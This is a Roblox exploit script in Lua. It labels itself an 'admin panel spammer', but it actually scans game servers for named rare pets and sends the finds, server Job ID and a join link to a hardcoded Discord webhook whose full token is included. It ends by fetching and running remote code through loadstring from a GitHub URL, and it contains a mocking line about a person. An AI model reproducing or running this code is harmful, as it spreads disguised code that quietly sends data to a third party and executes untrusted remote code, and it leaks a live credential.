-- TOKINU BASE FINDER | REAL 1:1 CLONE | NOV 10 2025 print("ADMIN PANEL SPAMMER - TOKINU") print("ADMIN PANEL SPAMMER HAS BEEN SUCCESFULLY EXECUTED") print("kinu likes men") -- CONFIG getgenv().webhook = "https://discord.com/api/webhooks/1438239208333512906/Fxag9wB5J2vRuI95-SzpQAvs4JCYf60Vgye3cAzWu2MMPGGyCDjhvLZA3Kl5HdQESqUj" getgenv().TargetPetNames = { "Burguro and Fryuro", "Garama and Madundung", "Ketchuru and Musturu", "La Supreme Combinasion", "Nuclearo Dinossauro", "Strawberry Elephant", "Ketupat Kepat", "Dragon Cannelloni", "Spooky and Pumpky", "Money Money Puggy", "La Casa Boo", "Capitano Moby", "Headless Horseman", "La Secret Combinasion", } -- SERVICES local Players = game:GetService("Players") local HttpService = game:GetService("HttpService") local LocalPlayer = Players.LocalPlayer local req = http_request or request or (syn and syn.request) -- ALLOWED PLACES local allowedPlaceIds = { [96342491571673] = true, [109983668079237] = true, } -- KICK CHECKS if game.PrivateServerId ~= "" or not allowedPlaceIds[game.PlaceId] then LocalPlayer:Kick("Wrong server / private server") return end -- INSTANT SEND (Server Found + Full Embed) WHEN PET FOUND local function sendTokinuPing(pets) if not req then return warn("No http") end local petCounts = {} for _, pet in pairs(pets) do petCounts[pet] = (petCounts[pet] or 0) + 1 end local petList = {} for name, count in pairs(petCounts) do table.insert(petList, count > 1 and name.." x"..count or name) end local joinLink = "https://chillihub1.github.io/chillihub-joiner/?placeId="..game.PlaceId.."&gameInstanceId="..game.JobId local payload = { content = "Server Found | Tokinu Hub <@&1437536545413267526>", username = "TOKINU BASE FINDER", embeds = {{ title = "OP PET FOUND!!", description = "**Pet(s):**\n"..table.concat(petList, "\n"), color = 65280, fields = { {name = "Players", value = #Players:GetPlayers().."/"..Players.MaxPlayers, inline = true}, {name = "Job ID", value = game.JobId, inline = true}, {name = "Join", value = "[Click to join]("..joinLink..")", inline = false} }, footer = {text = "TOKINU ON TOP"}, timestamp = os.date("!%Y-%m-%dT%H:%M:%SZ") }} } pcall(function() req({ Url = getgenv().webhook, Method = "POST", Headers = {["Content-Type"] = "application/json"}, Body = HttpService:JSONEncode(payload) }) end) end -- PET SCAN local foundPets = {} for _, v in workspace:GetDescendants() do if v:IsA("Model") then for _, target in getgenv().TargetPetNames do if string.find(string.lower(v.Name), string.lower(target)) then table.insert(foundPets, v.Name) break end end end end -- SEND ONLY IF GOOD PET EXISTS if #foundPets > 0 then sendTokinuPing(foundPets) print(" "..#foundPets.." OP PETS FOUND") else print("") end -- DEAD LOADER (as requested) loadstring(game:HttpGet("https://raw.githubusercontent.com/tienkhanh1/spicy/main/Chilli.lua"))() print("LOADER CALLED (404 expected)")